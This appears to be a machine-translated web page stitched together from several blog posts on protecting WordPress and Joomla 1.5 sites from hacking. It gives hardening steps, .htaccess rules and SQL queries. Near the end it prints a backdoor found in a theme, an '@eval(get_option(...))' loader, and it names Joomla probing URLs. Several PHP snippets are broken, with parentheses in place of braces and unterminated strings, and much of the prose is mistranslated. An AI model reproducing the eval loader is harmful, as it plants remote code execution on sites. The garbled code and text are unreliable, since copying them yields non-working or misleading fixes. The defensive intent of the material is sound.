They attack the wordpress admin panel what to do. Reliable WordPress protection against hacking. Use a secure connection

From the article you will learn:

1. Use a good login.

Protecting a WordPress site starts with the elementary - creating a good login. When installing WordPress, users often use the login that the installer offers by default, namely − admin. This is what bots looking for holes in the security of your site check in the first place. Using this login, you already provide half of the necessary information for hackers, and they just have to guess the password.

If you have already installed the platform and are working on your site, then you are unlikely to want to remove the installation and start from scratch in order to use a more secure login. There is an exit:

Step 1 - Creating a New User

Log in to the WordPress admin panel and create a new account with a more complex login, endowed with full access to all site functions, i.e. administrator rights.

From the main menu on the left, select Users >> Add New.

Enter all required information for the new user, defining their role as "Administrator" and press "Add new user".

Step 2 - Deleting the admin user

After that, log out of the control system, log in with a new account and delete the user admin from the system in one of the following ways:

Method 1 – From the main menu on the left select Users >> All users. Hover over username admin and you will see the function "Delete".

Method 2 – From the main menu on the left, select Users >> All users. Find a user admin, tick it and from the drop down menu "Actions" select "Delete". After that click on the option "Apply" below the list of users. This option is useful if you need to remove multiple users at once.

You can also change the username admin through a database query:
UPDATE wp_users SET user_login = 'new_login' WHERE user_login = 'admin';

This method has a minus: the author for posts written by the user admin, will not be changed. In order to fix this, you need to make another query to the database:
UPDATE wp_posts SET post_author = 'new_login' WHERE post_author = 'admin';

2. Use a complex and unique password.

Protecting the WordPress admin area is, of course, impossible without a strong, good password. It is important that it be unique and include numbers, letters of different registers, punctuation marks, symbols, and so on. Passwords like: pass, 1q2w3e4r5t6y, 87654321, qwerty, abc123, 111111, 1234, your date of birth, etc. – are not reliable, but many users continue to use them. Example of a good password: pcVaOF8r39. Of course, it will be difficult for you to remember such a password, but for this there are a number of programs that store and generate passwords, and can also be integrated into your browser interface (for example, Password Agent, KeyPass, Roboform, etc.)

If you still would like to remember your passwords by heart, we recommend that you create a combined password from a name/word you know well, with a few large letters/numbers in random places, and a few special characters at the beginning or end. Such a password will also be difficult to guess, but it will be easy enough to remember.

Remember to update your passwords regularly.

3. Update your WordPress version.

WordPress cares about its users and that's why you can find logout notifications in the admin panel. new version. We recommend that you update as soon as you see it, because one of the most common breaches in the security of your site is the use of outdated version platforms.

4. Hide WordPress version.

WordPress by default adds the current version number to source your files and pages. And since quite often it is not always possible to update the WordPress version on time, this can become weak point your website. Knowing what version of WordPress you have, a hacker can do a lot of harm.

With the help of a file functions.php you can disable the display of information about the version of your platform. To do this, you need to open the file functions.php, located in the root folder of your website's current theme (wp-content/themes/current_wordpress_theme), and add the following code:
remove_action('wp_head', 'wp_generator');

Or you can add the following code to the file functions.php:

/* Hide WP version strings from scripts and styles
* @return (string) $src
* @filter script_loader_src
* @filter style_loader_src
*/
function fjarrett_remove_wp_version_strings($src) (
global $wp_version;
parse_str(parse_url($src, PHP_URL_QUERY), $query);
if (!empty($query['ver']) && $query['ver'] === $wp_version) (
$src = remove_query_arg('ver', $src);
}
return $src;
}
add_filter('script_loader_src', 'fjarrett_remove_wp_version_strings');
add_filter('style_loader_src', 'fjarrett_remove_wp_version_strings');

/* Hide WP version strings from generator meta tag */
function wpmudev_remove_version() (
return";
}
add_filter('the_generator', 'wpmudev_remove_version');

Apart from the above, in any WordPress theme folder, you will find header.php file. It also lists the version of your installation, which is very interesting for a hacker, as mentioned earlier. By removing the following line from the file, you will get rid of this extra information:

” />

5. Download themes and plugins from trusted sources.

WordPress is so widespread that more and more developers are creating ready-made themes and plugins for it. While most of them will make your site easier to use and enhance its functionality, some can hide very unpleasant consequences in the form of viruses and open doors for hackers. Use only trusted download resources for themes and plugins, such as wordpress.org, and pay attention to any warnings about malicious files that appear. As with WordPress itself, it's important to keep plugins up to date with the latest versions.

6. Do not store unnecessary files.

Inactive extensions can pose a serious threat to the security of your site. Therefore, feel free to remove all unused plugins and themes. For example, you installed to test and choose the one you will use. After choosing, do not forget to delete all unnecessary ones.

7. Regularly check your local computer for viruses.

Taking the various steps to secure your WordPress site is fine, but you also need to keep an eye on your computer. You must have a constantly updated antivirus installed. Otherwise, you risk infecting your website by uploading virus files.

8. Make site backups.

Not all malicious attacks can be prevented, but just one successful attack can destroy all the efforts of working on your site. We recommend making regular website backups. Many hosting companies provide the option of server backups and in which case, you can restore the site from a copy that is available on the server.

By installing the WordPress Database Backup plugin, you can additionally secure your website database. The plugin settings allow you to set the option to send a daily database backup to your contact mailbox.

9. Use a secure connection.

If you prefer to upload your files using an FTP client, use a secure SFTP server connection protocol.

10. Create an .htaccess file.

Hotlink protection code:

Rewrite Engine On
RewriteCond %(HTTP_REFERER) !^http://(.+\.)?yourdomain\.com/
RewriteCond %(HTTP_REFERER) !^$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpg [L]

Hotlinking is the insertion of an image from your server to someone else's website/blog. The traffic goes directly to your server.

With the code above, you can force the server to check where exactly the request came from: if from the pages of your website, then the server gives the image to the user without problems; if from someone else's website, it shows an image with an error.

11. Change the prefix of the database tables.

WordPress protection against hackers will also increase if you remove the initial prefix wp_- this will complicate the search for intruders. Let's consider several ways:

Method 1 - Suitable for new installations via Softaculous
If your hosting provider allows you to use the Softaculous script to install WordPress, then you can change the prefix during the initial installation: in the Advanced Options section, you will need to make the required changes.

Method 2 – For Live Sites and Fresh WordPress Installations
If your WordPress has been installed for a long time and the site is working, then you can change the prefix using the phpMyAdmin program.

Select the required database from the list and make the following database query:

RENAME table `wp_commentmeta` TO `newprefix_commentmeta`;
RENAME table `wp_comments` TO `newprefix_comments`;
RENAME table `wp_links` TO `newprefix_links`;
RENAME table `wp_options` TO `newprefix_options`;
RENAME table `wp_postmeta` TO `newprefix_postmeta`;
RENAME table `wp_posts` TO `newprefix_posts`;
RENAME table `wp_terms` TO `newprefix_terms`;
RENAME table `wp_term_relationships` TO `newprefix_term_relationships`;
RENAME table `wp_term_taxonomy` TO `newprefix_term_taxonomy`;
RENAME table `wp_usermeta` TO `newprefix_usermeta`;
RENAME table `wp_users` TO `newprefix_users`;

where "newprefix_" needs to be replaced with the new prefix you want to use instead of the prefix "wp_".

After that, you will see the new prefix in the database tables:

To make sure that all changes were successful and the wp_ prefix is no longer used in the table _options and _usermeta, you will need to make another query to the database:

SELECT * FROM `newprefix_options` WHERE `option_name` LIKE '%wp_%'

SELECT * FROM `newprefix_usermeta` WHERE `meta_key` LIKE '%wp_%'

As a result, you can find a number of prefixes that you will need to manually rename using the button Change:

The number of changes you need to make may vary. But all prefixes wp_ you must change to your new prefix for the website to function properly.

After that, don't forget to also make the prefix changes in wp-config.php file:

You can also use special plugins to change the database prefix: Change DB prefix or Change table prefix.

12. Limit the number of access attempts.

Most often, attackers make a huge number of attempts to enter your site, picking up a password. You can configure the system so that the IP address is blocked for several hours after a certain number of failed login attempts.

To do this, you can use additional plugins, such as Login LockDown or Limit Login Attempts. In the settings of these plugins, you can independently set the number of login attempts and blocking time.

Additionally, it is possible to remove the display of a message stating that the entered login and password are incorrect. After all, this is also information that can help an attacker.

To remove the output of this message, you need to open the file functions.php, located in your website's current theme folder (wp-content/themes/current_wordpress_theme) and add this code:
add_filter('login_errors',create_function('$a', "return null;"));

13. Remove readme.html and license.txt.

The readme.html and license.txt files are present in the root folder of any WordPress installation. You do not need these files, and they can expose hackers to their atrocities. For example, to find out the current version of your WordPress and many other useful things for hacking a website. We recommend removing them immediately after installing WordPress.

14. Use an SSL certificate.

To transfer secure information and confidentiality of data exchange, we recommend using the SSL protocol. This is especially true for online stores if you do not want personal data about your customers to be transmitted in an insecure way.

First of all, you will need to install it for your domain name.

After that, you can set the mandatory use of the SSL protocol when logging into your site's control panel. To do this, open wp-config.php file located in the root folder of your website and add the following line:
define('FORCE_SSL_ADMIN', true);

15. Modify the wp-config.php file.

By adding this code to wp-config.php file, you can also strengthen the protection of your website:

Restriction on theme and plugin changes:
define('DISALLOW_FILE_EDIT', true);

Disabling the ability to install and remove plugins:
define('DISALLOW_FILE_MODS', true);

Adding salt keys or so-called security keys: you will first need to find such strings in wp-config.php file:

You will see that the keys are already installed and you can change them. Or you will see lines like this: 'put your unique phrase here', which indicates that the keys have not yet been set:
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the (@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service)
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'put your unique phrase here');
define('SECURE_AUTH_KEY', 'put your unique phrase here');
define('LOGGED_IN_KEY', 'put your unique phrase here');
define('NONCE_KEY', 'put your unique phrase here');
define('AUTH_SALT', 'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT', 'put your unique phrase here');
define('NONCE_SALT', 'put your unique phrase here');

I would like to mention some plugins separately:

This is a WordPress security plugin that allows you to scan your website for malicious code, hacker holes and loopholes, showing real-time website and traffic analytics. There is also the possibility of setting up automatic scanning and much more.

This plugin checks your website for various security vulnerabilities and offers a range of methods to fix them. For example, passwords, different file permissions, database protection, WordPress version information protection, administrator protection, and more.

This plugin allows you to secure user accounts and logins, databases and file system, prevent brute force attacks (password guessing attacks), scan the site, and more.

As sad as it may sound, protecting WordPress is a complex thing, and the methods described in this article do not guarantee 100% that your site will be completely protected from any fraudulent activities. However, they should not be neglected, as they will significantly reduce the possibility of hacking the site by intruders.

WordPress is a very popular CMS, this is not undoubtedly its plus, there are many plugins for any task, but this is also its weakness, because the more popular the CMS for the site, the more attacks on it, more precisely, it is more interesting for a hacker, since having found a vulnerability With WordPress, hundreds of thousands of sites are exposed to attackers, so protecting your WordPress site needs special attention.

Why are WordPress sites hacked?

All popular CMS (website engines) are hacked, and WordPress is no exception, I hack mainly with the help of so-called programs (scripts) - exploits, to gain control over the site, this is done mainly to create links from your site to other resources, and to create a BotNet that deals with DDoS attacks on other servers, while the site remains operational, and you will never see with the naked eye that it is infected. In any case, hacking will have a bad effect on your site, and you may even disappear from the search results.

As I said, hacking occurs automatically, it is not difficult to determine the CMS of a site, there are many online services for this, often an attacking program tries to guess the password from the administrative part of the site, i.e. goes to the address your-site.ru/wp-admin and tries to guess the password for your user, it is not difficult to find out the username, you write articles under it, so the login will be visible to bots, they know where to look. unless of course you closed it with a plugin, one of which we'll talk about below. The password from the site administrator should be very complex, but even if this condition is met, you can’t let bots sort out (brute) the password from the “admin panel”, because this is not a necessary load on the server, imagine if several dozens of bots from different parts of the world are doing this.

Plugin to protect WordPress from attacks

Let's move on to the plugin, worthy of listening to a few, let's talk about a simpler and more understandable one, I use it on many of my projects, for customers, it copes very well with the tasks of protecting the site -

This plugin is quite easy to learn, and 90% Russified, it is installed like any plugin from the WordPress repository, after installation you need to activate it and make the basic settings. It appears in the main menu in the WordPress admin

WP Security plugin dashboard

After going to the plugin settings, we get to the control panel. Here you can make the main important settings.

It shows the last 5 authorizations in your admin panel, the user and IP address are indicated, for example, I immediately see my IPs, there are only two of them, so I have no doubt that someone else knows my password from the administrative part.
The section of the most important functions, everything needs to be included here, and you agree with everything.
The plugin is able to track file changes on the hosting, and it can send a report to your mail, and you are always aware of what files you have changed, this is very useful if you have uploaded some script or any file with malicious code, you will immediately see it in the report, the only negative, after updating any other plugins you have installed or the WordPress engine itself, WP Security will see all these changes and send you a huge list, but you can get used to these reports, because you know when you updated the files yourself.
This item changes the standard address of the site admin panel yoursite.ru/wp-admin to yoursite.ru/luboe-slovo , this will save your admin panel from some unfortunate hackers and bots, but unfortunately not from everyone, especially advanced ones still find it, I can judge this by looking at the “Authorizations” section, but more on that later.
This item should be turned off, as in the screenshot, it is needed only when you want to put the site on maintenance, visitors will be given a sign with a message that the site is undergoing technical work, sometimes it is useful, for example, when changing the design of the site, or with some global changes, do not forget that in this mode search robots cannot view your site either, do not close it for a long time.

Protecting the WordPress Admin from Password Guessing

Now let's go to the menu item - Authorization, in my opinion a very useful item, and it should be configured, as it is on one of my sites. with an attendance of about 1000 people, the plugin catches dozens of attempts per day to guess the password to the admin panel, and adds the IP addresses of the hackers to the black list, i.e. blocks it completely, the site stops responding to this IP address, thereby nullifying attempts to pick up a password, on the settings screen that I do.

I leave the number of attempts to “make a mistake” -3, do not do less, you can type the password incorrectly yourself, and you will have to get blacklisted with your IP
This is the time after which the counter of invalid login attempts is reset.
The period of blocking IP addresses from which there were incorrect authorization attempts, I set more, in minutes, i.e. bath for a long time, on the screen it costs 6,000,000 minutes, this is about 11 years, I think that's enough

All blocked IPs will be denied access not only to the admin panel, but to the entire site, keep this in mind

List of blocked IP addresses

IP address of the attacker
the login to which the password was selected, by the way, is correct
date when the automatic lock was made

White list of addresses for the admin panel

To allow access to the administrative part of the WordPress site only from certain IP addresses, you can activate the white list of addresses in the plugin settings.

activating this option
here is your current IP address
in this field enter all IP addresses from which access to the admin panel is allowed

If you need to specify a range of IP addresses, then instead of a number, use an asterisk, for example 192.168.5.* - this construction will give access to the wordpress admin panel from all ips starting with these numbers, this method can be useful for those who do not have a dedicated ip address , and it is constantly changing, for example, when working with mobile Internet, as a rule, the range will remain within the first two digits, like this for example 192.168.*.*

Reading time: 4 min

A year ago, my server load very often exceeded the limit allowed by the tariff limit. At the same time, the problem was not in the sites themselves, but in a banal attack by intruders on the admin panel, in order to gain access for some of their purposes.

Today I will tell you how I coped with the problem, which I advise you to do just in case at home.

As a result, it was decided to change the address of the login form in the admin panel, as well as cover the admin panel for all outsiders who do not have my IP.
It is worth noting that some hosting companies themselves have automatically created a new admin address for all users. If you use the services of such hosting, then do not read further articles and do not waste time.
How to Change WordPress Admin Address
I posted this article before. Here it seems to be a similar result, but the effect and purpose are different.
Don't forget to back up the files you work with.
First, copy the wp-login.php file from the site root (where wp-config.php is located) to ftp to your computer.
Rename it whatever you like. For example vhod.php
Open this file with the free Notepad++ program (or whatever you prefer to edit) and replace all occurrences of the phrase wp-login.php with vhod.php .

You can quickly do this by pressing CTRL+F in Notepad++. Well, in the window that appears, enter:
So in a second I replaced the occurrence of the phrase I needed in the entire file. It came across 12 times.
Upload the new file to ftp.
A similar thing will need to be done in the general-template.php file, which you will find in the wp-includes folder right there on ftp. Those. change the occurrence of the phrase wp-login.php to vhod.php , but do not change the file name itself!
Now you have a .htaccess file in the same place at the root of the site. We also copy it to our computer and open it for editing (you can use the usual Windows Notepad). We insert such a piece of code that blocks everyone from accessing the wp-login.php file
Order Deny,Allow Deny from all

< Files wp - login . php >
Order Deny
Deny from all
< / Files >

It was this step that removed the load, and also hid the authorization form. The load was removed by inserting the presented code into .htaccess: if there was a call to http://site.ru/wp-login.php, then it would return a 403 error, not a 404.
Let us briefly repeat the algorithm of work:
Rename the wp-login.php file to an arbitrary name and replace the occurrences of the name in it with a new one.
Similarly, we replace the old name wp-login.php in the general-template.php file with the new one.
We prescribe in the .htaccess file a ban on wp-login.php access for everyone

After updating WordPress, only the general-template.php file will need to be fixed. But since the engine is updated not so often - this is a trifle compared to the effect.
We put a restriction on entering by IP through .htaccess
As an additional measure to protect the site, I adopted a restriction on entering the admin panel by IP. The problem was solved very simply: create an empty .htaccess file and add the following code to it
order deny,allow allow from 192.168.0.1 deny from all

order deny , allow
allow from 192.168.0.1
deny from all

We save the file and upload it to the wp-admin folder in the same place at the root of the site.
Instead of my IP from the example, put your real one. Moreover, you can add several IPs from a new line each:
order deny,allow allow from 126.142.40.16 allow from 195.234.69.6 deny from all

order deny , allow
allow from 126.142.40.16
allow from 195.234.69.6
deny from all

If the IP is dynamic, then you can put numbers only up to the first-second-third dot:

Do you already know how to get into the WordPress admin area?

You can do this in at least four ways by adding the following to your site address:

/admin, i.e. like this: http://yoursite/admin
/wp-admin
/login
/wp-login.php

In general, all three first options by redirect (redirect) will lead you anyway to the page: http://your_site/wp-login.php

It turns out that anyone can add any of the four prefixes described above to the address of your site and see the admin panel entrance:

Of course, this does not mean at all that this anyone can also easily get into the admin panel, because he still needs to know the Username or your e-mail and your password.

If your administrator user has a login: - then this is not at all prudent on your part and the attacker will only have to guess or guess your password.

In addition, did you see the inscription: Username or e-mail ? Yes, yes, it is e-mail that WordPress can use as a Username. But you could specify an E-mail address somewhere on the site that matches the E-mail of the administrator user. It turns out that the first thing an attacker can try is to enter your E-mail and here WordPress will help him again, because if the E-mail does not match, he will see this message:

and if the E-mail is correct, WordPress will write that the password for it is not correct:

As a result, we have a situation in which a potential attacker will only need to guess or guess your password to hack your site (access to the admin panel).

How to protect the entrance to the admin panel from a potential threat? The answer is simple - try to increase the number of unknowns required for entry.

And now let's take a closer look:

If possible, make sure that the E-mail of the administrator user is not mentioned anywhere on the site - the public E-mail should be something else.
Your password should not be simple, when installing WordPress itself generates a complex password for you, if you do not want to use it, come up with some more or less complex password that includes small and large characters, numbers and some characters like -, ?, _ etc.
Your username should also not be simple, no: admin, manager, root, administrator, user and other simple words!
And finally, you need to enter the third most important unknown - change the admin login URL, for this, install a simple plugin: WPS Hide Login

WPS Hide Login

A simple, free and quite popular plugin that allows you to change the admin login URL.

After installing and activating the plugin, you need to go to the admin section: Settings / General, then scroll to the very bottom of the page and see just one parameter added by this plugin:

By default, the plugin suggests using the http://yoursite/login login - but this is by no means the best option! Come up with something of your own, for example: yyy12_go)))

After changing this parameter, do not forget to click on the button Save Changes– otherwise, when the plugin is active, you will be logged in via http://yoursite/login

Be sure to try to log out and log in again to the admin panel, but at the new login address that you yourself came up with, and most importantly, do not forget it!

After changing the entry point to the admin panel, when trying to access the standard URLs, the user will receive a 404 error page.

Attention! If you suddenly forget the new admin login address, you will need to disable this plugin. You can do this without getting into the admin panel if you have access to the folders and files of the site. You just need to rename or delete the plugin folder wps-hide-login, which will be in the folder plugins(the plugins folder is in the wp-content folder).

As a result: after applying all the above measures, we should get the protection of the admin panel login with three unknowns: E-mail / Username, a complex password and its own unique login URL - and this can greatly complicate the attempts of young hackers)

Hello, dear readers of the blog site. Today I want to talk about the security of work and some methods of protecting the site from hacking. Unfortunately, I am not an expert in this area and my knowledge does not go much beyond the scope of the article about, but I will simply describe my recent experience. I have not used anything complicated, but I hope that this will increase the security of working with my sites.

It will be about double authentication to enter the admin panel of the engine your site (should work on any CMS, but I personally only tested on WordPress and Joomla). Protection is set at the server level, so all attempts to guess the password to the admin panel (brute force) will not create an increased load on the hosting and it is quite difficult to bypass it. It is set up easily (literally in a few steps) and of all the knowledge it requires only attentiveness and the ability to access the site via FTP.

Well, I’ll also give a couple of actions that I applied to sites on the already obsolete Joomla 1.5 engines, which I don’t really make sense to transfer to, but which they constantly break and use the server to send spam. I performed the described actions recently, so I cannot state the fact that the infection of sites with viruses has stopped, but I hope so. In general, I tried a bit improve Joomla 1.5 hack resistance.

How to protect Joomla 1.5 from hacks and viruses

As I mentioned above, the problem lies in the constant hacks of my two sites, which are running Joomla 1.5. You can consider them abandoned, because I don’t add new materials to them, but they regularly generate income (from posting articles from Miralinks and Webartex, as well as links from Gogetlinks). In general, it’s a pity to throw them away, but to transfer them to a new version of the engine “for scrap” (it’s a pity for the time and effort spent).

It remains either to constantly monitor the load on the server and, when it increases, look for shells and other malware among the engine files, or somehow strengthen protection. To search for malware, I download the engine files to a computer and check them with DoctorWeb and Aibolit. The former does not find everything, and the latter sees the enemy too often where he is not, but I don’t know any other effective methods. Although, there are also dozens of programs, but this is already more convenient for anyone.

By the way, the script Aibolit can work not only on the server, but also directly on the computer in the folder with the downloaded engine files (just don’t forget to turn off the standard antivirus when downloading the site, because it can fix some of the files, but they will still remain on the server).

Detailed instructions are given in the video below, and in short, you download the PHP language interpreter from the Microsoft website and install it. After that, open the Aibolit script file called ai-bolit.php using this very interpreter:

The crawl speed depends on the speed of your computer and the number of files in your site engine. It took me several hours for the https: // site, because even Aibolit suspects pictures of hiding viruses, and I have a lot of these same pictures, and cache files take a lot of time when scanning. For sites on Joomla 1.5, the check was much faster.

Decided to spend a day looking for ways to improve site security. We managed to do quite a bit, but still better than nothing. Let's start with strengthening protection (from vulnerability reduction) of two sites on Joomla 1.5. The following has been done:

How else to protect Joomla 1.5 from viruses and stream hacks

Also, "specialists" assure that sites on Joomla 1.5 are broken "on one or two" by using the one in the engine (through it you can supposedly change the admin password). Even if you do not use registration on your site and do not display a link to restore anywhere, this does not mean that you have covered this vulnerability. Just add the following snippet to your site's home page url and you'll get the feature you're looking for: /index.php?option=com_user&view=reset
Actually, to close this loophole (but I still don’t understand how to use it for hacking), you can simply delete this file:
/components/com_user/models/reset.php True, after that, none of the users registered on your site will be able to use the password recovery function, but for me it was not important, because registration was not provided.
They also say that such a useful shnyag as adding to the page address also allows virus writers and hunters of other people's good to get to some sensitive areas of your site and make it destructive, or in some other way over abuse him. This thing is again removed by editing one of the engine files. /libraries/Joomla/application/module/helper.php
There you need to remove two pieces of code, or comment them out by enclosing them in /* and */ (this code will not be executed by the language interpreter). The first snippet is:
If(count($result) == 0) ( if(JRequest::getBool("tp")) ( $result = JModuleHelper::getModule("mod_".$position); $result->title = $position; $result->content = $position; $result->position = $position; ) )
And the second one is:
If(JRequest::getBool("tp")) ( $attribs["style"] .= " outline"; )
Actually, after that, you reset the cache and try to view the positions of the modules in your template using the following construction:
https://website/?tp=1
If it didn’t work out, then you hopefully closed this hole.
Very often, sites are hacked not from the outside, but from the inside. Trojans and keylogens on your computer know what to look for and where, so do not store passwords in FTP clients(there is an option to use for this case). It is even cooler to disable the ability to access your site via FTP, but instead, where the transmitted information (including passwords) is encrypted, which makes it useless to intercept it. To be honest, I neglect the last advice because of my “darkness”. There is also an option to configure access to your site via regular FTP only from a specific IP address (your computer), but my ISP has a dynamic IP (it changes in a certain range).
Also advise engine no higher than those that are actually required for its operation. In fact, I didn’t really think about setting it according to the template: 755 for folders and 644 for files. everything is possible with the help of the same Filezilla. Moreover, these rights must be applied not only to the directories of the root folder, but also to all directories and files that lie inside them.
I set the rights to 444 on the files in the root folder, and 705 on the tmp and logs directories. Of course, it would be possible to “clamp” it more tightly, but I don’t have much experience in this, and there was no time to waste time on experiments. And besides, all this will not seriously deter hackers, because there are things that can nullify all our efforts. To do this, use the following commands:

Therefore, in order to completely “concrete” the files of the Joomla 1.5 engine from hacking and encroachment, it is necessary to prohibit the change of access rights to files and folders through PHP. This is done in the server settings, but I don't know how and where yet. If you know, please post a link.
All of the above is designed to reduce the likelihood of your site being hacked and penetrated by shells and other malware. However, the precautions taken are no guarantee, so it would be great on a server (where your Joomla 1.5 site lives). This will remove all the negativity from the leaked wickedness. However, personally, again, I have not yet implemented this for reasons of my “darkness”. I would be grateful for links to materials explaining this process.

Very often break sites, gaining access to the administrative panel. It is clear that it is password-protected, therefore, using the brute force (smart selection) method, many, even seemingly complex passwords are broken into one or two. therefore admin needs to be protected too, and it is better to do this not with the help of additional extensions, but with the help of the server. There are several protection options. For example, you can change the URL address of the admin panel in one way or another so that the hacker could not start his dirty business.

Another method of protection, which will be described in detail below, is to create an additional barrier in the way of an intruder (a living person or a script). It consists in password-protecting the directory with admin files (in Joomla this is the administrator folder, and in WordPress - wp-admin) using the web server. It turns out that when accessing the admin panel, you will first need to enter a username and password to access the folder, and only then a username and password to access, in fact, the engine admin panel. Moreover, by breaking the first line of defense using brute-force methods, the malware will not create any significant additional load on the server, which is good.

Another very important, in my opinion, note to increase the security of your sites from hacking and virus infection is to follow the rule: one site - one hosting account. Yes, it's more expensive, but much safer. When placed on one account, all your sites will be immediately available via FTP when the malware gains access to only one of them. They break sites on the machine, and it would not be reasonable to hope that the scripts do not go up the directory tree. In addition, it is very difficult to treat a bunch of sites on one hosting account, because by dealing with one site you lose sight of the already cured one, which is being infected at that time.
By the way, they can break not only from your own site, but also from the site of your hosting neighbor, if the owners did not properly take care of excluding this possibility. They can also hack the hosting panel (like,), but in any case, the number of hacks due to the hoster's fault is negligible compared to the number of hacks due to the carelessness of site owners.

How to protect the admin area of your site from hacking?

I want to talk in detail about the method of protection that I recently used myself. It is included in denying access to folders where files of the administrative panel of the site are located. The ban is set using a wonderful .htaccess file, which, in fact, allows you to remotely control the settings of the web server on which your site is installed. At the same time, he knows how to do it selectively.

All directives written in .htaccess will only apply to the directory in which it is located. Do you want to change something in the settings for the entire site? Put then .htaccess in the root folder. Well, we are interested in the settings regarding only the folder with the admin panel files, so we will put it there. In Joomla this will be the administrator folder, in WordPress it will be wp-admin.

However, one .htaccess is not enough for us. You will also have to use .htpasswd, where the login and password will be stored to access this very administrative folder. Moreover, the password will be stored not in open form, but in the form of an MD5 cipher. It will not work to recover the password using it, but when you enter the correct combination in the password field, the web server will calculate the MD5 amount for this combination and compare it with what is stored in .htpasswd. If the data matches, then you will be allowed into the Joomla or WordPress admin area, and if not, then they will not be allowed in.

That's all, it remains only to bring the plan to life. You need to add some directives to .htaccess. Do you know what? I dont know. Yes, and somehow you will need to overtake the password in the MD5 sequence. Problem. However, it has a fairly simple solution. Kind people organized an online service for generating content for the .htaccess file and the .htpasswd file based on the login and password you came up with. True, you will also have to specify the absolute path to the administrative folder, but these are already trifles.

So, meet - the great and terrible protection generator for your site's admin panel. Understandable, right? Come up with, and best of all on some create two most complex combinations of letters, numbers and signs, and then enter them into the top two fields. Just don’t forget to write them down, or push them into the password manager, otherwise you won’t be able to enter the admin panel yourself and you will have to start doing everything described in this part again.

Here, now. Do you know this one? Even if you don't know, don't worry. Connect to the site via FTP, create a file with any name in its root (yes, even with this url_path.php) and add this simple code to it:

"; echo "Full path to the script and its name: ".$_SERVER["SCRIPT_FILENAME"]."
"; echo "Script name: ".$_SERVER["SCRIPT_NAME"]; ?>

Then go to the browser and enter this URL in the address bar (with your domain, of course):

https://website/url_path.php

As a result, you will see the same absolute path that you were interested in. Enter it in the .htaccess and .htpasswd file generator above. Don't forget to add at the end of this path the name of the administrator or wp-admin folder without the trailing slash. That's it, now click on the "Generate" button

And in turn transfer the content for the .htaccess and .htpasswd files directly into these same files.

I hope that you have already created them in the administrator or wp-admin folders (depending on the engine you use)?

Well, now try to go to the admin panel. A window appears asking you to enter a username and password from your web server? It renders differently in different browsers, but in Chrome it looks like this:

If something does not stick, then "smoke" the absolute path to .htpasswd, specified in the .htaccess file. In this case, just manually correct it when editing the file. That's all I wanted to tell you today. If you want to scold or add something, then go.

Virus in WordPress?

After writing this article, I discovered malware on my blog (https: // site) (or something that was installed without my will). I just wanted to change something in the code and got into . At the very bottom, just before the Body tag, I was struck by a call to some function unfamiliar to me (by its name, but I didn’t find anything worthwhile):

The name seems to be reasonable. Remarkably, three weeks earlier, I accidentally discovered that I had a new table in the databases of two of my WordPress blogs (https://site and another). Her name was just wonderful - wp-config. Googling for this name again did not give anything worthwhile, because all the answers were related to the wp-config.php file of the same name.

This table quickly grew in size (up to hundreds of megabytes on the https: // site) and the addresses of the pages of my site with various parameters were written into it. Not understanding the essence of this process, I just demolished this table and that's it. By the way, I have another blog on WordPress, but nothing like this was observed there.

Well, here I found such a “speaking” insert in the topic. I also decided to see if something was added there that was consonant with the line described above at the bottom of the footer. It turned out that it was added. And so neatly - neither at the very top, nor at the very bottom, but the second (or third) from the top inscribed function:

Function wp_custom_page_links_return() ( $option = get_option("wp_custom_page_links"); @eval($option); ) @eval(get_option("wp_brlinks"));

This is where the wonderful “eval” catches your eye. Remarkably, Aibolit (described above) found this fragment suspicious, but I haven’t got my hands on it yet, because this script already suspects many people of unreliability. I also googled about this code and found a post (unfortunately, now that domain was blocked for non-payment) with a description of a similar problem. A friend leaked this muck with a new topic, into which some kind of installation code was sewn.

I have topics on both infected blogs have been standing for many years. Probably, there was some kind of vulnerability in the engine or, which ill-wishers quickly (on the stream) took advantage of. In general, check for yourself the absence of such inclusions. The date of change of the described files fell, in my opinion, in mid-September of this year.

I advise you to also look at a selection of 17 video tutorials on securing sites on Joomla. They will play one after another automatically, and if you want, you can switch to the next lesson using the corresponding button on the player panel or select the desired lesson from the drop-down menu in the upper left corner of the player window:

Enjoy watching!

Good luck to you! See you soon on the blog pages site

Computer tips for novice users